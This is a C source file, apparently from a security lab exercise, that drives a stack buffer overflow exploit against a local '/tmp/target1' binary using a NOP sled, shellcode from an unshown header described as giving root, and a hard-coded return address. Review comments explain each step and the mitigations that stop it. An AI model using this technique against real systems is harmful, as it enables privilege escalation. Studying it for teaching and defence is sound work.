// NOTE(review): the angle-bracket header names were lost in extraction; only
// the bare `#include` directives below survived.  The calls used in main()
// (malloc, memset, memcpy, strlen, execve) are declared in the standard
// headers <stdlib.h>, <string.h> and <unistd.h>.
#include
#include
#include
#include "shellcode.h"

// Proof-of-concept driver for a classic stack buffer overflow: this program
// execs the vulnerable target ("/tmp/target1") with a crafted argv[1] that
// overruns a fixed-size stack buffer in the target's function foo and
// replaces foo's saved return address.
//
// Read as a defender, every step below depends on the absence of a control
// that is commonly on by default today.  A stack canary (-fstack-protector)
// placed between the buffer and the saved frame is clobbered by this write
// and detected before foo returns; a non-executable stack (NX/DEP) stops the
// injected bytes from running; ASLR makes the hard-coded buffer address at
// the end wrong on each run; and a bounds-checked copy in the target removes
// the overflow entirely.  The PoC only works when all of those are absent.
int main(void) {
    char *args[3];  // the argv that main in the target program will receive
    char *env[1];   // environment passed to the target; left empty

    args[0] = "/tmp/target1";  // argv[0] is conventionally the executable name
    args[2] = NULL;            // argv must be NULL-terminated for execve
    env[0] = NULL;             // empty environment

    // args[1] is the attack string.  Its size, per the author's analysis of
    // target1: 256 bytes to fill foo's buffer, 4 bytes to cover the saved
    // ebp, 4 bytes that land on the return address, plus 1 for the NUL
    // terminator = 265.  These offsets are specific to that binary's frame
    // layout (32-bit x86, judging by the ebp reference and 4-byte slots).
    args[1] = malloc(265);
    // NOTE(review): malloc is not checked for NULL before it is written to.
    memset(args[1], 0x90, 264);  // fill with 0x90 (the x86 NOP) so execution
                                  // slides forward into the payload; it also
                                  // keeps stray 0x00 bytes out of the string,
                                  // which would end it early when the target
                                  // copies it as a C string
    args[1][264] = '\0';          // terminate the string

    // The payload bytes come from shellcode.h (not on this page); the author
    // describes them as instructions that yield root access when executed
    // inside the target.  strlen stops at the first 0x00 byte, so the payload
    // is assumed to contain none -- TODO confirm against shellcode.h.
    memcpy(args[1], shellcode, strlen(shellcode));

    // Overwrite the slot that will hold foo's saved return address (offset
    // 256 + 4 = 260) with the address of the start of the overflowed buffer,
    // so that returning from foo lands in the NOP sled and then the payload.
    // The author obtained 0xffffdc5c with gdb on target1 launched from this
    // driver; it is only valid for that exact environment, program path and
    // environment block, since any change shifts the stack.  With ASLR on it
    // differs on every run, which is precisely what that mitigation is for.
    // NOTE(review): storing an unsigned int through a cast of a char* is an
    // unaligned, strict-aliasing-violating write, and it silently relies on
    // the host's byte order matching the target's.
    *(unsigned int*)(args[1] + 260) = 0xffffdc5c;

    // Launch the target with the crafted argv.  execve only returns on
    // failure, and that failure is not checked here.
    execve("/tmp/target1", args, env);
}